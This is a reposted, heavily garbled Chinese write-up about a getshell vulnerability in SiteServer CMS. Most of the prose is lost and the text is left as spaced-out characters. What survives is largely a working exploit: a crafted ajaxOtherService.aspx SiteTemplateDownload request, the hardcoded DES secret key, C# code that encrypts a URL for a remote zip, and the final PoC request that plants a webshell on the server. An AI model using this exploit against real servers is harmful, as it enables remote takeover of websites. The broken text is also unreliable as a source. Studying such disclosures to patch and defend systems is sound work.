[13750] 2019-02-12_简记siteserver远程模板下载Getshell漏洞

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2019-02-12_简记siteserver远程模板下载Getshell漏洞 s i t e s e r v e r G e t s h e l l   1 u 0 h u n   F r e e B u f   2 0 1 9 - 0 2 - 1 2 0 x 0 1   0 x 0 a   访     使 g o o g l e   h a c k i n g 访 u r l R e f e r e r   U A 访 u r l 访 使 0 x 0 b   D 2 0 1 8 - 1 0 - 0 4 s p i d e r u r l s o u g o u h a o s o u s o b a i d u U A
w e b s h e l l i n c l u d e . a s p x a s p d m . t x t ( a s p d m . t x t 使 i n c l u d e . a s p x ) I I S 8 访 1 4 6 a j a x o t h e r s e r v i c e . a s p x 访 U R L w e b s h e l l 访 h t t p : / / w w w . x x x . c o m / A j a x / a j a x O t h e r S e r v i c e . a s p x ? t y p e = S i t e T e m p l a t e D o w n l o a d & u s e r K e y P r e f i x = t e s t & d o w n l o a d U r l = Z j Y I u b 0 s l a s h 0 Y x A 2 n Y L I Z N D e U m d d 3 G B h w b u B X I 4 s 2 b p H 2 C V m t g 2 H 0 s l a s h 0 Q G Z 4 0 a d d 0 Z W 0 i i V b i 0 s l a s h 0 M D y t V n p Z K l i D w 0 e q u a l s 0 & d i r e c t o r y N a m e = t x t 2   z i p 使 z i p w e b s h e l l w e b s h e l l w e b s h e l l z i p a s p x t o m c a t w a r 0 x 0 2   0 x 0 a   使 s i t e s e r v e r   c m s c m s h t t p s : / / w w w . s i t e s e r v e r . c n / 0   d a y g e t s h e l l   a j a x O t h e r S e r v i c e d o w n l o a d U r l g e t s h e l l 5 . 0 5 . 0 0 x 0 b   a j a x O t h e r S e r v i c e . c s S i t e T e m p l a t e D o w n l o a d 使 n o t e p a d + + a j a x O t h e r S e r v i c e . c s S i t e T e m p l a t e D o w n l o a d ( s t r i n g d o w n l o a d U r l ,   s t r i n g   d i r e c t o r y N a m e ,   s t r i n g   u s e r K e y P r e f i x )
d o w n l o a d U r l U R L d i r e c t o r y N a m e u s e r K e y P r e f i x A j a x O t h e r S e r v i c e . c s 使 P a g e _ L o a d r e q u e s t [ t y p e ] t y p e T y p e S i t e T e m p l a t e D o w n l o a d   r e q u e s t D e c r y p t S t r i n g B y S e c r e t K e y d o w n l o a d u r l S i t e T e m p l a t e D o w n l o a d   A j a x O t h e r S e r v i c e T y p e S i t e T e m p l a t e D o w n l o a d   =   S i t e T e m p l a t e D o w n l o a d t y p e S i t e T e m p l a t e D o w n l o a d S i t e T e m p l a t e D o w n l o a d d o w n l o a d u r l T r a n s l a t e U t i l s . D e c r y p t S t r i n g B y S e c r e t K e y D e c r y p t S t r i n g B y S e c r e t K e y D e c r y p t S t r i n g B y S e c r e t K e y ( s t r i n g   i n p u t S t r i n g ) s e c r e t K e y D e c r y p t S t r i n g B y S e c r e t K e y ( s t r i n g i n p u t S t r i n g ,   s t r i n g   s e c r e t K e y ) s e c r e t K e y W e b C o n f i g U t i l s . S e c r e t K e y W e b C o n f i g U t i l s . c s w e b . c o n f i g S e c r e t K e y w e b . c o n f i g D e c r y p t S t r i n g B y S e c r e t K e y ( s t r i n g   i n p u t S t r i n g ,   s t r i n g   s e c r e t K e y ) s e c r e t K e y W e b C o n f i g U t i l s . S e c r e t K e y ,
+ = & ? / D E S 使 p y t h o n D E S D E S e n c r y p t o r D e s D e c r y p t i n p u t S t r i n g s e c r e K e y 使 h t t p : / / w w w . r u n o o b . c o m / _ e n c r y p t K e y _ i n p u t S t r i n g _ i n p u t S t r i n g _ e n c r y p t K e y d o w n l o a d u r l Z j Y I u b / Y x A 3 Q e m p k V B K 4 C o i V o 3 M 6 0 7 H / T B f 7 F 0 a P c U E =   使 p y t h o n u r l d o w n l o a d u r l d o w n l o a d u r l Z j Y I u b 0 s l a s h 0 Y x A 3 Q e m p k V B K 4 C o i V o 3 M 6 0 7 H 0 s l a s h 0 T B f 7 F 0 a P c U E 0 e q u a l s 0 0 s e c r e t 0 p y Z j Y I u b / Y x A 2 n Y L I Z N D e U m d d 3 G B h w b u B X I 4 s 2 b p H 2 C V m t g 2 H / Q G Z 4 + Z W 0 i i V b i / M D y t V n p Z K l i D w = _ i n p u t S t r i n g u s i n g   S y s t e m ;   u s i n g   S y s t e m . I O ;   u s i n g   S y s t e m . S e c u r i t y . C r y p t o g r a p h y ;   u s i n g   S y s t e m . T e x t ;   n a m e s p a c e   E n c r y p t A p p l i c a t i o n   {   c l a s s   E n c r y p t           {   s t a t i c   v o i d   M a i n ( s t r i n g [ ]   a r g s )               {                   v a r   _ e n c r y p t K e y   =   " v E n f k n 1 6 t 8 a e a Z K G 3 a 4 G l 9 U U l z f 4 v g q U 9 x w h 8 Z V 5 " ;                   v a r   _ d e c r y p t K e y   =   " v E n f k n 1 6 t 8 a e a Z K G 3 a 4 G l 9 U U l z f 4 v g q U 9 x w h 8 Z V 5 " ;                 v a r   _ i n p u t S t r i n g   =   " h t t p : / / 1 2 7 . 0 . 0 . 1 : 9 9 / t x t 2 . z i p " ;                 v a r   _ o u t S t r i n g   =   " " ;   v a r   _ n o t e M e s s a g e   =   " " ;                 b y t e [ ]   i v   =   {   0 x 1 2 ,   0 x 3 4 ,   0 x 5 6 ,   0 x 7 8 ,   0 x 9 0 ,   0 x A B ,   0 x C D ,   0 x E F   } ;                 t r y {                         v a r   b y K e y   =   E n c o d i n g . U T F 8 . G e t B y t e s ( _ e n c r y p t K e y . L e n g t h   >   8   ?   _ e n c r y p t K e y . S u b s t r i n g ( 0 ,   8 )   :   _ e n c r y p t K e y ) ;                       v a r   d e s   =   n e w   D E S C r y p t o S e r v i c e P r o v i d e r ( ) ;                       v a r   i n p u t B y t e A r r a y   =   E n c o d i n g . U T F 8 . G e t B y t e s ( _ i n p u t S t r i n g ) ;                       v a r   m s   =   n e w   M e m o r y S t r e a m ( ) ;                       v a r   c s   =   n e w   C r y p t o S t r e a m ( m s ,   d e s . C r e a t e E n c r y p t o r ( b y K e y ,   i v ) ,   C r y p t o S t r e a m M o d e . W r i t e ) ;           c s . W r i t e ( i n p u t B y t e A r r a y ,   0 ,   i n p u t B y t e A r r a y . L e n g t h ) ;                   c s . F l u s h F i n a l B l o c k ( ) ;                     _ o u t S t r i n g   =   C o n v e r t . T o B a s e 6 4 S t r i n g ( m s . T o A r r a y ( ) ) ;                     C o n s o l e . W r i t e L i n e ( " D e s E n c r y p t : " ) ;   C o n s o l e . W r i t e L i n e ( _ o u t S t r i n g ) ;   }             c a t c h   ( E x c e p t i o n   e r r o r )   {   _ n o t e M e s s a g e   =   e r r o r . M e s s a g e ;   }     }   }   }
0 x 0 3     d o w n l o a d u r l I P h t t p : / / 1 2 7 . 0 . 0 . 1 : 9 9 / t x t 2 . z i p s e c r e t K e y : v E n f k n 1 6 t 8 a e a Z K G 3 a 4 G l 9 U U l z f 4 v g q U 9 x w h 8 Z V 5 d o w n l o a d u r l : Z j Y I u b / Y x A 3 Q e m p k V B K 4 C o i V o 3 M 6 0 7 H / T B f 7 F 0 a P c U E = d o w n l o a d u r l Z j Y I u b 0 s l a s h 0 Y x A 3 Q e m p k V B K 4 C o i V o 3 M 6 0 7 H 0 s l a s h 0 T B f 7 F 0 a P c U E 0 e q u a l s 0 0 s e c r e t 0 P O C w e b s h e l l / A j a x / a j a x O t h e r S e r v i c e . a s p x t y p e = S i t e T e m p l a t e D o w n l o a d & u s e r K e y P r e f i x = t e s t & d o w n l o a d U r l = Z j Y I u b 0 s l a s h 0 Y x A 3 Q e m p k V B K 4 C o i V o 3 M 6 0 7 H 0 s l a s h 0 T B f 7 F 0 a P c U E 0 e q u a l s 0 & d i r e c t o r y N a m e = t x t 2 访 使 u r l z i p 访 0 x 0 4   w e b s h e l l * 1 u 0 h u n F r e e B u f

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则